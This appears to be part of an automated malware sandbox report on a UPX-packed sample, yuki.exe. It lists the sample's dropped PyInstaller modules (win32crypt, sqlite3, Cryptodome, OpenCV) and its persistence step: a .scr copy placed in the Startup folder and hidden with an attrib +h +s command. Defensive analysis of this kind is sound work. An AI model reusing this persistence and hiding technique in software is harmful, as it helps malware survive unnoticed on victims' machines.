Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\lz4\_version.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\python312.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_elementtree.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\opencv_videoio_ffmpeg4100_64.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\zstandard\backend_c.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\cv2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\python312.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\block\_block.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\cv2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\zstandard\backend_c.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_uuid.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy.libs\msvcp140-d64049c6e3865410a7dda6a7e9f0c575.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_webp.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_webp.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy.libs\msvcp140-d64049c6e3865410a7dda6a7e9f0c575.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\zstandard\_cffi.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_elementtree.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\pywin32_system32\pywintypes312.dllJump to dropped file
